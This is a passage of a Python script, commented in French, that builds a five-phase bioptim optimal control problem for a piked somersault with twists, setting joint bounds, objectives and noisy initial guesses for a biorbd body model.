    Returns ``sum_i (q[dofs[i]] - targets[i]) ** 2`` where ``q`` is the
    generalized-coordinate state taken at the start point of the interval
    (a CasADi expression at solve time).
    """
    q = controller.states['q'].cx_start
    return sum((q[dof] - targets[index]) ** 2 for index, dof in enumerate(dofs))
def prepare_ocp(
biorbd_model_path: str, nb_twist: int, seed : int,
ode_solver: OdeSolver = OdeSolver.RK4(),
) -> OptimalControlProgram:
"""
Prepare the ocp
Parameters
----------
biorbd_model_path: str
The path to the bioMod file
ode_solver: OdeSolver
The ode solver to use
Returns
-------
The OptimalControlProgram ready to be solved
"""
final_time = 1.87
n_shooting = (40, 100, 100, 100, 40)
biomodel = (BiorbdModel(biorbd_model_path))
biorbd_model = (biomodel,biomodel, biomodel, biomodel,biomodel)
nb_q = biorbd_model[0].nb_q
nb_qdot = biorbd_model[0].nb_qdot
nb_qddot_joints = nb_q - biorbd_model[0].nb_root
# Pour la lisibilite
X = 0
Y = 1
Z = 2
Xrot = 3
Yrot = 4
Zrot = 5
ZrotBD = 6
YrotBD = 7
ZrotABD = 8
XrotABD = 9
ZrotBG = 10
YrotBG = 11
ZrotABG = 12
XrotABG = 13
XrotC = 14
YrotC = 15
vX = 0
vY = 1
vZ = 2
vXrot = 3
vYrot = 4
vZrot = 5
vZrotBD = 6
vYrotBD = 7
vZrotABD = 8
vYrotABD = 9
vZrotBG = 10
vYrotBG = 11
vZrotABG = 12
vYrotABG = 13
vXrotC = 14
vYrotC = 15
# Add objective functions
objective_functions = ObjectiveList()
# objective_functions.add(ObjectiveFcn.Mayer.MINIMIZE_MARKERS, marker_index=1, weight=-1)
objective_functions.add(ObjectiveFcn.Lagrange.MINIMIZE_CONTROL, key="qddot_joints", node=Node.ALL_SHOOTING,
weight=1, phase=0)
objective_functions.add(ObjectiveFcn.Lagrange.MINIMIZE_CONTROL, key="qddot_joints", node=Node.ALL_SHOOTING,
weight=1, phase=1)
objective_functions.add(ObjectiveFcn.Lagrange.MINIMIZE_CONTROL, key="qddot_joints", node=Node.ALL_SHOOTING,
weight=1, phase=2)
objective_functions.add(ObjectiveFcn.Lagrange.MINIMIZE_CONTROL, key="qddot_joints", node=Node.ALL_SHOOTING,
weight=1, phase=3)
objective_functions.add(ObjectiveFcn.Lagrange.MINIMIZE_CONTROL, key="qddot_joints", node=Node.ALL_SHOOTING,
weight=1, phase=4)
objective_functions.add(ObjectiveFcn.Mayer.MINIMIZE_TIME, min_bound=.0, max_bound=1.0, weight=100000,
phase=0)
objective_functions.add(ObjectiveFcn.Mayer.MINIMIZE_TIME, min_bound=.0, max_bound=1.0, weight=100000,
phase=2)
objective_functions.add(ObjectiveFcn.Mayer.SUPERIMPOSE_MARKERS, node=Node.END, first_marker='MidMainG',
second_marker='CibleMainG', weight=1000, phase=0)
objective_functions.add(ObjectiveFcn.Mayer.SUPERIMPOSE_MARKERS, node=Node.END, first_marker='MidMainD',
second_marker='CibleMainD', weight=1000, phase=0)
# arrete de gigoter les bras
les_bras = [ZrotBD, YrotBD, ZrotABD, XrotABD, ZrotBG, YrotBG, ZrotABG, XrotABG]
les_coudes = [ZrotABD, XrotABD, ZrotABG, XrotABG]
objective_functions.add(minimize_dofs, custom_type=ObjectiveFcn.Lagrange, node=Node.ALL_SHOOTING,
dofs=les_coudes, targets=np.zeros(len(les_coudes)), weight=1000, phase=0)
objective_functions.add(minimize_dofs, custom_type=ObjectiveFcn.Lagrange, node=Node.ALL_SHOOTING,
dofs=les_bras, targets=np.zeros(len(les_bras)), weight=10, phase=0)
objective_functions.add(minimize_dofs, custom_type=ObjectiveFcn.Lagrange, node=Node.ALL_SHOOTING,
dofs=les_bras, targets=np.zeros(len(les_bras)), weight=10, phase=1)
objective_functions.add(minimize_dofs, custom_type=ObjectiveFcn.Lagrange, node=Node.ALL_SHOOTING,
dofs=les_bras, targets=np.zeros(len(les_bras)), weight=10, phase=2)
objective_functions.add(minimize_dofs, custom_type=ObjectiveFcn.Lagrange, node=Node.ALL_SHOOTING,
dofs=les_bras, targets=np.zeros(len(les_bras)), weight=10, phase=3)
objective_functions.add(minimize_dofs, custom_type=ObjectiveFcn.Lagrange, node=Node.ALL_SHOOTING,
dofs=les_bras, targets=np.zeros(len(les_bras)), weight=10, phase=4)
objective_functions.add(minimize_dofs, custom_type=ObjectiveFcn.Lagrange, node=Node.ALL_SHOOTING,
dofs=les_coudes, targets=np.zeros(len(les_coudes)), weight=1000, phase=4)
# ouvre les hanches rapidement apres la vrille
objective_functions.add(minimize_dofs, custom_type=ObjectiveFcn.Mayer, node=Node.END, dofs=[XrotC],
targets=[0], weight=10000, phase=3)
# Dynamics
dynamics = DynamicsList()
dynamics.add(DynamicsFcn.JOINTS_ACCELERATION_DRIVEN)
dynamics.add(DynamicsFcn.JOINTS_ACCELERATION_DRIVEN)
dynamics.add(DynamicsFcn.JOINTS_ACCELERATION_DRIVEN)
dynamics.add(DynamicsFcn.JOINTS_ACCELERATION_DRIVEN)
dynamics.add(DynamicsFcn.JOINTS_ACCELERATION_DRIVEN)
qddot_joints_min, qddot_joints_max, qddot_joints_init = -500, 500, 0
u_bounds = BoundsList()
for i in range(5):
u_bounds.add("qddot_joints", min_bound=[qddot_joints_min] * nb_qddot_joints, max_bound=[qddot_joints_max] * nb_qddot_joints, phase=i)
u_init = InitialGuessList()
for i in range(5):
u_init.add("qddot_joints", [qddot_joints_init] * nb_qddot_joints, phase=i)
u_init[i]["qddot_joints"].add_noise(
bounds=u_bounds[i]["qddot_joints"],
magnitude=0.2,
magnitude_type=MagnitudeType.RELATIVE,
n_shooting=n_shooting[i],
seed=seed,
)
# Path constraint
x_bounds = BoundsList()
for i in range(5):
x_bounds.add("q", min_bound=biorbd_model[0].bounds_from_ranges("q").min, max_bound=biorbd_model[0].bounds_from_ranges("q").max, phase=i)
x_bounds.add("qdot", min_bound=biorbd_model[0].bounds_from_ranges("qdot").min, max_bound=biorbd_model[0].bounds_from_ranges("qdot").max, phase=i)
# Pour la lisibilite
DEBUT, MILIEU, FIN = 0, 1, 2
#
# Contraintes de position: PHASE 0 la montee en carpe
#
zmax = 8
# 12 / 8 * final_time**2 + 1 # une petite marge
# deplacement
x_bounds[0]["q"].min[X, :] = -.1
x_bounds[0]["q"].max[X, :] = .1
x_bounds[0]["q"].min[Y, :] = -1.
x_bounds[0]["q"].max[Y, :] = 1.
x_bounds[0]["q"].min[:Z + 1, DEBUT] = 0
x_bounds[0]["q"].max[:Z + 1, DEBUT] = 0
x_bounds[0]["q"].min[Z, MILIEU:] = 0
x_bounds[0]["q"].max[Z, MILIEU:] = zmax # beaucoup plus que necessaire, juste pour que la parabole fonctionne
# le salto autour de x
x_bounds[0]["q"].min[Xrot, :] = 0
# 2 * 3.14 + 3 / 2 * 3.14 - .2
x_bounds[0]["q"].max[Xrot, :] = -.50 + 3.14
x_bounds[0]["q"].min[Xrot, DEBUT] = .50 # penche vers l'avant un peu carpe
x_bounds[0]["q"].max[Xrot, DEBUT] = .50
x_bounds[0]["q"].min[Xrot, MILIEU:] = 0
x_bounds[0]["q"].max[Xrot, MILIEU:] = 4 * 3.14 + .1 # salto
# limitation du tilt autour de y
x_bounds[0]["q"].min[Yrot, DEBUT] = 0
x_bounds[0]["q"].max[Yrot, DEBUT] = 0
x_bounds[0]["q"].min[Yrot, MILIEU:] = - 3.14 / 16 # vraiment pas suppose tilte
x_bounds[0]["q"].max[Yrot, MILIEU:] = 3.14 / 16
# la vrille autour de z
x_bounds[0]["q"].min[Zrot, DEBUT] = 0
x_bounds[0]["q"].max[Zrot, DEBUT] = 0
x_bounds[0]["q"].min[Zrot, MILIEU:] = -.1 # pas de vrille dans cette phase
x_bounds[0]["q"].max[Zrot, MILIEU:] = .1
# bras droit
x_bounds[0]["q"].min[YrotBD, DEBUT] = 2.9 # debut bras aux oreilles
x_bounds[0]["q"].max[YrotBD, DEBUT] = 2.9
x_bounds[0]["q"].min[ZrotBD, DEBUT] = 0
x_bounds[0]["q"].max[ZrotBD, DEBUT] = 0
# bras gauche
x_bounds[0]["q"].min[YrotBG, DEBUT] = -2.9 # debut bras aux oreilles
x_bounds[0]["q"].max[YrotBG, DEBUT] = -2.9
x_bounds[0]["q"].min[ZrotBG, DEBUT] = 0
x_bounds[0]["q"].max[ZrotBG, DEBUT] = 0
# coude droit
x_bounds[0]["q"].min[ZrotABD:XrotABD + 1, DEBUT] = 0
x_bounds[0]["q"].max[ZrotABD:XrotABD + 1, DEBUT] = 0
# coude gauche
x_bounds[0]["q"].min[ZrotABG:XrotABG + 1, DEBUT] = 0
x_bounds[0]["q"].max[ZrotABG:XrotABG + 1, DEBUT] = 0
# le carpe
x_bounds[0]["q"].min[XrotC, DEBUT] = -.50 # depart un peu ferme aux hanches
x_bounds[0]["q"].max[XrotC, DEBUT] = -.50
x_bounds[0]["q"].max[XrotC, FIN] = -2.5
# x_bounds[0].min[XrotC, FIN] = 2.7 # min du modele
# le dehanchement
x_bounds[0]["q"].min[YrotC, DEBUT] = 0
x_bounds[0]["q"].max[YrotC, DEBUT] = 0
x_bounds[0]["q"].min[YrotC, MILIEU:] = -.1
x_bounds[0]["q"].max[YrotC, MILIEU:] = .1
# Contraintes de vitesse: PHASE 0 la montee en carpe
vzinit = 9.81 / (2 * final_time ) # vitesse initiale en z du CoM pour revenir a terre au temps final
# decalage entre le bassin et le CoM
CoM_Q_sym = MX.sym('CoM', nb_q)
CoM_Q_init = x_bounds[0]["q"].min[:nb_q,
DEBUT] # min ou max ne change rien a priori, au DEBUT ils sont egaux normalement
CoM_Q_func = Function('CoM_Q_func', [CoM_Q_sym], [biorbd_model[0].center_of_mass(CoM_Q_sym)])
bassin_Q_func = Function('bassin_Q_func', [CoM_Q_sym],
[biorbd_model[0].homogeneous_matrices_in_global(CoM_Q_sym, 0).to_mx()]) # retourne la RT du bassin
r = np.array(CoM_Q_func(CoM_Q_init)).reshape(1, 3) - np.array(bassin_Q_func(CoM_Q_init))[-1,
:3] # selectionne seulement la translation de la RT
# en xy bassin
x_bounds[0]["qdot"].min[vX:vY + 1, :] = -10
x_bounds[0]["qdot"].max[vX:vY + 1, :] = 10
x_bounds[0]["qdot"].min[vX:vY + 1, DEBUT] = -.5
x_bounds[0]["qdot"].max[vX:vY + 1, DEBUT] = .5
# z bassin
x_bounds[0]["qdot"].min[vZ, :] = -50
x_bounds[0]["qdot"].max[vZ, :] = 50
x_bounds[0]["qdot"].min[vZ, DEBUT] = vzinit - .5
x_bounds[0]["qdot"].max[vZ, DEBUT] = vzinit + .5
# autour de x
x_bounds[0]["qdot"].min[vXrot, :] = .5 # d'apres une observation video
x_bounds[0]["qdot"].max[vXrot, :] = 20 # aussi vite que nécessaire, mais ne devrait pas atteindre cette vitesse
# autour de y
x_bounds[0]["qdot"].min[vYrot, :] = -50
x_bounds[0]["qdot"].max[vYrot, :] = 50
x_bounds[0]["qdot"].min[vYrot, DEBUT] = 0
x_bounds[0]["qdot"].max[vYrot, DEBUT] = 0
# autour de z
x_bounds[0]["qdot"].min[vZrot, :] = -50
x_bounds[0]["qdot"].max[vZrot, :] = 50
x_bounds[0]["qdot"].min[vZrot, DEBUT] = 0
x_bounds[0]["qdot"].max[vZrot, DEBUT] = 0
# tenir compte du decalage entre bassin et CoM avec la rotation
# Qtransdot = Qtransdot + v cross Qrotdot
borne_inf = (x_bounds[0]["qdot"].min[vX:vZ + 1, DEBUT] + np.cross(r, x_bounds[0]["qdot"].min[vXrot:vZrot + 1, DEBUT]))[0]
borne_sup = (x_bounds[0]["qdot"].max[vX:vZ + 1, DEBUT] + np.cross(r, x_bounds[0]["qdot"].max[vXrot:vZrot + 1, DEBUT]))[0]
x_bounds[0]["qdot"].min[vX:vZ + 1, DEBUT] = min(borne_sup[0], borne_inf[0]), min(borne_sup[1], borne_inf[1]), min(
borne_sup[2], borne_inf[2])
x_bounds[0]["qdot"].max[vX:vZ + 1, DEBUT] = max(borne_sup[0], borne_inf[0]), max(borne_sup[1], borne_inf[1]), max(
borne_sup[2], borne_inf[2])
# bras droit
x_bounds[0]["qdot"].min[vZrotBD:vYrotBD + 1, :] = -50
x_bounds[0]["qdot"].max[vZrotBD:vYrotBD + 1, :] = 50
x_bounds[0]["qdot"].min[vZrotBD:vYrotBD + 1, DEBUT] = 0
x_bounds[0]["qdot"].max[vZrotBD:vYrotBD + 1, DEBUT] = 0
# bras droit
x_bounds[0]["qdot"].min[vZrotBG:vYrotBG + 1, :] = -50
x_bounds[0]["qdot"].max[vZrotBG:vYrotBG + 1, :] = 50
x_bounds[0]["qdot"].min[vZrotBG:vYrotBG + 1, DEBUT] = 0
x_bounds[0]["qdot"].max[vZrotBG:vYrotBG + 1, DEBUT] = 0
# coude droit
x_bounds[0]["qdot"].min[vZrotABD:vYrotABD + 1, :] = -50
x_bounds[0]["qdot"].max[vZrotABD:vYrotABD + 1, :] = 50
x_bounds[0]["qdot"].min[vZrotABD:vYrotABD + 1, DEBUT] = 0
x_bounds[0]["qdot"].max[vZrotABD:vYrotABD + 1, DEBUT] = 0
# coude gauche
x_bounds[0]["qdot"].min[vZrotABD:vYrotABG + 1, :] = -50
x_bounds[0]["qdot"].max[vZrotABD:vYrotABG + 1, :] = 50
x_bounds[0]["qdot"].min[vZrotABG:vYrotABG + 1, DEBUT] = 0
x_bounds[0]["qdot"].max[vZrotABG:vYrotABG + 1, DEBUT] = 0
# du carpe
x_bounds[0]["qdot"].min[vXrotC, :] = -50
x_bounds[0]["qdot"].max[vXrotC, :] = 50
x_bounds[0]["qdot"].min[vXrotC, DEBUT] = 0
x_bounds[0]["qdot"].max[vXrotC, DEBUT] = 0
# du dehanchement
x_bounds[0]["qdot"].min[vYrotC, :] = -50
x_bounds[0]["qdot"].max[vYrotC, :] = 50
x_bounds[0]["qdot"].min[vYrotC, DEBUT] = 0
x_bounds[0]["qdot"].max[vYrotC, DEBUT] = 0
#
# Contraintes de position: PHASE 1 le salto carpe
#
# deplacement
x_bounds[1]["q"].min[X, :] = -.1
x_bounds[1]["q"].max[X, :] = .1
x_bounds[1]["q"].min[Y, :] = -1.
x_bounds[1]["q"].max[Y, :] = 1.
x_bounds[1]["q"].min[Z, :] = 0
x_bounds[1]["q"].max[Z, :] = zmax # beaucoup plus que necessaire, juste pour que la parabole fonctionne
# le salto autour de x
x_bounds[1]["q"].min[Xrot, :] = 0
x_bounds[1]["q"].max[Xrot, :] = -.50 + 4 * 3.14
x_bounds[1]["q"].min[Xrot, FIN] = 2 * 3.14 - .1
# limitation du tilt autour de y
x_bounds[1]["q"].min[Yrot, :] = - 3.14 / 16
x_bounds[1]["q"].max[Yrot, :] = 3.14 / 16
# la vrille autour de z
x_bounds[1]["q"].min[Zrot, :] = -.1
x_bounds[1]["q"].max[Zrot, :] = .1
# le carpe
x_bounds[1]["q"].max[XrotC, :] = -2.5
# le dehanchement
x_bounds[1]["q"].min[YrotC, DEBUT] = -.1
x_bounds[1]["q"].max[YrotC, DEBUT] = .1
# Contraintes de vitesse: PHASE 1 le salto carpe
# en xy bassin
x_bounds[1]["qdot"].min[vX:vY + 1, :] = -10
x_bounds[1]["qdot"].max[vX:vY + 1, :] = 10
# z bassin
x_bounds[1]["qdot"].min[vZ, :] = -50
x_bounds[1]["qdot"].max[vZ, :] = 50
# autour de x
x_bounds[1]["qdot"].min[vXrot, :] = -50
x_bounds[1]["qdot"].max[vXrot, :] = 50
# autour de y
x_bounds[1]["qdot"].min[vYrot, :] = -50
x_bounds[1]["qdot"].max[vYrot, :] = 50
# autour de z
x_bounds[1]["qdot"].min[vZrot, :] = -50
x_bounds[1]["qdot"].max[vZrot, :] = 50
# bras droit
x_bounds[1]["qdot"].min[vZrotBD:vYrotBD + 1, :] = -50
x_bounds[1]["qdot"].max[vZrotBD:vYrotBD + 1, :] = 50
# bras droit
x_bounds[1]["qdot"].min[vZrotBG:vYrotBG + 1, :] = -50
x_bounds[1]["qdot"].max[vZrotBG:vYrotBG + 1, :] = 50
# coude droit
x_bounds[1]["qdot"].min[vZrotABD:vYrotABD + 1, :] = -50
x_bounds[1]["qdot"].max[vZrotABD:vYrotABD + 1, :] = 50
# coude gauche
x_bounds[1]["qdot"].min[vZrotABD:vYrotABG + 1, :] = -50
x_bounds[1]["qdot"].max[vZrotABD:vYrotABG + 1, :] = 50
# du carpe
x_bounds[1]["qdot"].min[vXrotC, :] = -50
x_bounds[1]["qdot"].max[vXrotC, :] = 50
# du dehanchement
x_bounds[1]["qdot"].min[vYrotC, :] = -50
x_bounds[1]["qdot"].max[vYrotC, :] = 50
#
# Contraintes de position: PHASE 2 l'ouverture
#
# deplacement
x_bounds[2]["q"].min[X, :] = -.2
x_bounds[2]["q"].max[X, :] = .2
x_bounds[2]["q"].min[Y, :] = -1.
x_bounds[2]["q"].max[Y, :] = 1.
x_bounds[2]["q"].min[Z, :] = 0
x_bounds[2]["q"].max[Z, :] = zmax # beaucoup plus que necessaire, juste pour que la parabole fonctionne
# le salto autour de x
x_bounds[2]["q"].min[Xrot, :] = 2 * 3.14 - .1
x_bounds[2]["q"].max[Xrot, :] = -.50 + 4 * 3.14
# limitation du tilt autour de y
x_bounds[2]["q"].min[Yrot, :] = - 3.14 / 4
x_bounds[2]["q"].max[Yrot, :] = 3.14 / 4
# la vrille autour de z
x_bounds[2]["q"].min[Zrot, :] = 0
x_bounds[2]["q"].max[Zrot, :] = 3.14 # 5 * 3.14
x_bounds[2]["q"].min[XrotC, FIN] = -.4
# Contraintes de vitesse: PHASE 2 l'ouverture
# en xy bassin
x_bounds[2]["qdot"].min[vX:vY + 1, :] = -10
x_bounds[2]["qdot"].max[vX:vY + 1, :] = 10
# z bassin
x_bounds[2]["qdot"].min[vZ, :] = -50
x_bounds[2]["qdot"].max[vZ, :] = 50
# autour de x
x_bounds[2]["qdot"].min[vXrot, :] = -50
x_bounds[2]["qdot"].max[vXrot, :] = 50
# autour de y
x_bounds[2]["qdot"].min[vYrot, :] = -50
x_bounds[2]["qdot"].max[vYrot, :] = 50
# autour de z
x_bounds[2]["qdot"].min[vZrot, :] = -50
x_bounds[2]["qdot"].max[vZrot, :] = 50
# bras droit
x_bounds[2]["qdot"].min[vZrotBD:vYrotBD + 1, :] = -50
x_bounds[2]["qdot"].max[vZrotBD:vYrotBD + 1, :] = 50
# bras droit
x_bounds[2]["qdot"].min[vZrotBG:vYrotBG + 1, :] = -50
x_bounds[2]["qdot"].max[vZrotBG:vYrotBG + 1, :] = 50
# coude droit
x_bounds[2]["qdot"].min[vZrotABD:vYrotABD + 1, :] = -50
x_bounds[2]["qdot"].max[vZrotABD:vYrotABD + 1, :] = 50
# coude gauche
x_bounds[2]["qdot"].min[vZrotABD:vYrotABG + 1, :] = -50
x_bounds[2]["qdot"].max[vZrotABD:vYrotABG + 1, :] = 50
# du carpe
x_bounds[2]["qdot"].min[vXrotC, :] = -50
x_bounds[2]["qdot"].max[vXrotC, :] = 50
# du dehanchement
x_bounds[2]["qdot"].min[vYrotC, :] = -50
x_bounds[2]["qdot"].max[vYrotC, :] = 50
#
# Contraintes de position: PHASE 3 la vrille et demie
#
# deplacement
x_bounds[3]["q"].min[X, :] = -.2
x_bounds[3]["q"].max[X, :] = .2
x_bounds[3]["q"].min[Y, :] = -1.
x_bounds[3]["q"].max[Y, :] = 1.
x_bounds[3]["q"].min[Z, :] = 0
x_bounds[3]["q"].max[Z, :] = zmax # beaucoup plus que necessaire, juste pour que la parabole fonctionne
# le salto autour de x
x_bounds[3]["q"].min[Xrot, :] = 0
x_bounds[3]["q"].min[Xrot, :] = 2 * 3.14 - .1
x_bounds[3]["q"].max[Xrot, :] = 2 * 3.14 + 3 / 2 * 3.14 + .1 # 1 salto 3/4
x_bounds[3]["q"].min[Xrot, FIN] = 2 * 3.14 + 3 / 2 * 3.14 - .1
x_bounds[3]["q"].max[Xrot, FIN] = 2 * 3.14 + 3 / 2 * 3.14 + .1 # 1 salto 3/4
# limitation du tilt autour de y
x_bounds[3]["q"].min[Yrot, :] = - 3.14 / 4
x_bounds[3]["q"].max[Yrot, :] = 3.14 / 4
x_bounds[3]["q"].min[Yrot, FIN] = - 3.14 / 8
x_bounds[3]["q"].max[Yrot, FIN] = 3.14 / 8
# la vrille autour de z
x_bounds[3]["q"].min[Zrot, :] = 0
x_bounds[3]["q"].max[Zrot, :] = 5 * 3.14
x_bounds[3]["q"].min[Zrot, FIN] = nb_twist * 3.14 - .1 # complete la vrille
x_bounds[3]["q"].max[Zrot, FIN] = nb_twist * 3.14 + .1
# le carpe f4a les jambes
x_bounds[3]["q"].min[XrotC, :] = -.4
# le dehanchement
# Contraintes de vitesse: PHASE 3 la vrille et demie
# en xy bassin
x_bounds[3]["qdot"].min[vX:vY + 1, :] = -10
x_bounds[3]["qdot"].max[vX:vY + 1, :] = 10
# z bassin
x_bounds[3]["qdot"].min[vZ, :] = -50
x_bounds[3]["qdot"].max[vZ, :] = 50
# autour de x
x_bounds[3]["qdot"].min[vXrot, :] = -50
x_bounds[3]["qdot"].max[vXrot, :] = 50
# autour de y
x_bounds[3]["qdot"].min[vYrot, :] = -50
x_bounds[3]["qdot"].max[vYrot, :] = 50
# autour de z
x_bounds[3]["qdot"].min[vZrot, :] = -50
x_bounds[3]["qdot"].max[vZrot, :] = 50
# bras droit
x_bounds[3]["qdot"].min[vZrotBD:vYrotBD + 1, :] = -50
x_bounds[3]["qdot"].max[vZrotBD:vYrotBD + 1, :] = 50
# bras droit
x_bounds[3]["qdot"].min[vZrotBG:vYrotBG + 1, :] = -50
x_bounds[3]["qdot"].max[vZrotBG:vYrotBG + 1, :] = 50
# coude droit
x_bounds[3]["qdot"].min[vZrotABD:vYrotABD + 1, :] = -50
x_bounds[3]["qdot"].max[vZrotABD:vYrotABD + 1, :] = 50
# coude gauche
x_bounds[3]["qdot"].min[vZrotABD:vYrotABG + 1, :] = -50
x_bounds[3]["qdot"].max[vZrotABD:vYrotABG + 1, :] = 50
# du carpe
x_bounds[3]["qdot"].min[vXrotC, :] = -50
x_bounds[3]["qdot"].max[vXrotC, :] = 50
# du dehanchement
x_bounds[3]["qdot"].min[vYrotC, :] = -50
x_bounds[3]["qdot"].max[vYrotC, :] = 50
#
# Contraintes de position: PHASE 4 la reception
#
# deplacement
x_bounds[4]["q"].min[X, :] = -.1
x_bounds[4]["q"].max[X, :] = .1
x_bounds[4]["q"].min[Y, FIN] = -.1
x_bounds[4]["q"].max[Y, FIN] = .1
x_bounds[4]["q"].min[Z, :] = 0
x_bounds[4]["q"].max[Z, :] = zmax # beaucoup plus que necessaire, juste pour que la parabole fonctionne
x_bounds[4]["q"].min[Z, FIN] = 0
x_bounds[4]["q"].max[Z, FIN] = .1
# le salto autour de x
x_bounds[4]["q"].min[Xrot, :] = 2 * 3.14 + 3 / 2 * 3.14 - .2 # penche vers avant -> moins de salto
x_bounds[4]["q"].max[Xrot, :] = -.50 + 4 * 3.14 # un peu carpe a la fin
x_bounds[4]["q"].min[Xrot, FIN] = -.50 + 4 * 3.14 - .1 # salto fin un peu carpe
x_bounds[4]["q"].max[Xrot, FIN] = -.50 + 4 * 3.14 + .1 # salto fin un peu carpe
# limitation du tilt autour de y
x_bounds[4]["q"].min[Yrot, :] = - 3.14 / 16
x_bounds[4]["q"].max[Yrot, :] = 3.14 / 16
# la vrille autour de z
x_bounds[4]["q"].min[Zrot, :] = nb_twist * 3.14 - .1 # complete la vrille
x_bounds[4]["q"].max[Zrot, :] = nb_twist * 3.14 + .1
# bras droit
x_bounds[4]["q"].min[YrotBD, FIN] = 2.9 - .1 # debut bras aux oreilles
x_bounds[4]["q"].max[YrotBD, FIN] = 2.9 + .1
x_bounds[4]["q"].min[ZrotBD, FIN] = -.1
x_bounds[4]["q"].max[ZrotBD, FIN] = .1
# bras gauche
x_bounds[4]["q"].min[YrotBG, FIN] = -2.9 - .1 # debut bras aux oreilles
x_bounds[4]["q"].max[YrotBG, FIN] = -2.9 + .1
x_bounds[4]["q"].min[ZrotBG, FIN] = -.1
x_bounds[4]["q"].max[ZrotBG, FIN] = .1
# coude droit
x_bounds[4]["q"].min[ZrotABD:XrotABD + 1, FIN] = -.1
x_bounds[4]["q"].max[ZrotABD:XrotABD + 1, FIN] = .1
# coude gauche
x_bounds[4]["q"].min[ZrotABG:XrotABG + 1, FIN] = -.1
x_bounds[4]["q"].max[ZrotABG:XrotABG + 1, FIN] = .1
# le carpe
x_bounds[4]["q"].min[XrotC, :] = -.4
x_bounds[4]["q"].min[XrotC, FIN] = -.60
x_bounds[4]["q"].max[XrotC, FIN] = -.40 # fin un peu carpe
# le dehanchement
x_bounds[4]["q"].min[YrotC, FIN] = -.1
x_bounds[4]["q"].max[YrotC, FIN] = .1
# Contraintes de vitesse: PHASE 4 la reception
# en xy bassin
x_bounds[4]["qdot"].min[vX:vY + 1, :] = -10
x_bounds[4]["qdot"].max[vX:vY + 1, :] = 10
# z bassin
x_bounds[4]["qdot"].min[vZ, :] = -50
x_bounds[4]["qdot"].max[vZ, :] = 50
# autour de x
x_bounds[4]["qdot"].min[vXrot, :] = -50
x_bounds[4]["qdot"].max[vXrot, :] = 50
# autour de y
x_bounds[4]["qdot"].min[vYrot, :] = -50
x_bounds[4]["qdot"].max[vYrot, :] = 50
# autour de z
x_bounds[4]["qdot"].min[vZrot, :] = -50
x_bounds[4]["qdot"].max[vZrot, :] = 50
# bras droit
x_bounds[4]["qdot"].min[vZrotBD:vYrotBD + 1, :] = -50
x_bounds[4]["qdot"].max[vZrotBD:vYrotBD + 1, :] = 50
# bras droit
x_bounds[4]["qdot"].min[vZrotBG:vYrotBG + 1, :] = -50
x_bounds[4]["qdot"].max[vZrotBG:vYrotBG + 1, :] = 50
# coude droit
x_bounds[4]["qdot"].min[vZrotABD:vYrotABD + 1, :] = -50
x_bounds[4]["qdot"].max[vZrotABD:vYrotABD + 1, :] = 50
# coude gauche
x_bounds[4]["qdot"].min[vZrotABD:vYrotABG + 1, :] = -50
x_bounds[4]["qdot"].max[vZrotABD:vYrotABG + 1, :] = 50
# du carpe
x_bounds[4]["qdot"].min[vXrotC, :] = -50
x_bounds[4]["qdot"].max[vXrotC, :] = 50
# du dehanchement
x_bounds[4]["qdot"].min[vYrotC, :] = -50
x_bounds[4]["qdot"].max[vYrotC, :] = 50
#
# Initial guesses
#
x0 = np.vstack((np.zeros((nb_q, 2)), np.zeros((nb_qdot, 2))))
x1 = np.vstack((np.zeros((nb_q, 2)), np.zeros((nb_qdot, 2))))
x2 = np.vstack((np.zeros((nb_q, 2)), np.zeros((nb_qdot, 2))))
x3 = np.vstack((np.zeros((nb_q, 2)), np.zeros((nb_qdot, 2))))
x4 = np.vstack((np.zeros((nb_q, 2)), np.zeros((nb_qdot, 2))))
# bras droit f4a la vrille
# décollage prise del aposition carpée
x0[Xrot, 0] = .50
x0[ZrotBG] = -.75
x0[ZrotBD] = .75
x0[YrotBG, 0] = -2.9
x0[YrotBD, 0] = 2.9
x0[YrotBG, 1] = -1.35
x0[YrotBD, 1] = 1.35
x0[XrotC, 0] = -.5
x0[XrotC, 1] = -2.6
# rotater en salto (x) en carpé
x1[ZrotBG] = -.75
x1[ZrotBD] = .75
x1[Xrot, 1] = 2 * 3.14
x1[YrotBG] = -1.35
x1[YrotBD] = 1.35
x1[XrotC] = -2.6
# ouverture des hanches
x2[Xrot] = 2 * 3.14
x2[Zrot, 1] = 0.2
x2[ZrotBG, 0] = -.75
x2[ZrotBD, 0] = .75
x2[YrotBG, 0] = -1.35
x2[YrotBD, 0] = 1.35
x2[XrotC, 0] = -2.6
# Vrille en position tendue
x3[Xrot, 0] = 2 * 3.14
x3[Xrot, 1] = 2 * 3.14 + 3 / 2 * 3.14
x3[Zrot, 0] = 0 # METTRE 0 ?
x3[Zrot, 1] = nb_twist * 3.14
# Aterrissage (réduire le tilt)
x4[Xrot, 0] = 2 * 3.14 + 3 / 2 * 3.14
x4[Xrot, 1] = 4 * 3.14
x4[Zrot] = nb_twist * 3.14
x4[XrotC, 1] = -.5
x_init = InitialGuessList()
x_init.add("q", initial_guess=x0[:nb_q, :], interpolation=InterpolationType.LINEAR, phase=0)
x_init.add("qdot", initial_guess=x0[nb_q:, :], interpolation=InterpolationType.LINEAR, phase=0)
x_init.add("q", initial_guess=x1[:nb_q, :], interpolation=InterpolationType.LINEAR, phase=1)
x_init.add("qdot", initial_guess=x1[nb_q:, :], interpolation=InterpolationType.LINEAR, phase=1)
x_init.add("q", initial_guess=x2[:nb_q, :], interpolation=InterpolationType.LINEAR, phase=2)
x_init.add("qdot", initial_guess=x2[nb_q:, :], interpolation=InterpolationType.LINEAR, phase=2)
x_init.add("q", initial_guess=x3[:nb_q, :], interpolation=InterpolationType.LINEAR, phase=3)
x_init.add("qdot", initial_guess=x3[nb_q:, :], interpolation=InterpolationType.LINEAR, phase=3)
x_init.add("q", initial_guess=x4[:nb_q, :], interpolation=InterpolationType.LINEAR, phase=4)
x_init.add("qdot", initial_guess=x4[nb_q:, :], interpolation=InterpolationType.LINEAR, phase=4)
for i in range(5):
x_init[i]["q"].add_noise(
bounds=x_bounds[i]["q"],
n_shooting=np.array(n_shooting[i])+1,
magnitude=0.2,
magnitude_type=MagnitudeType.RELATIVE,
seed=seed,
)
x_init[i]["qdot"].add_noise(
bounds=x_bounds[i]["qdot"],
n_shooting=np.array(n_shooting[i])+1,
magnitude=0.2,
magnitude_type=MagnitudeType.RELATIVE,
seed=seed,
)
constraints = ConstraintList()
constraints.add(ConstraintFcn.SUPERIMPOSE_MARKERS, node=Node.ALL_SHOOTING, min_bound=-.1, max_bound=.1,
first_marker='MidMainG', second_marker='CibleMainG', phase=1)
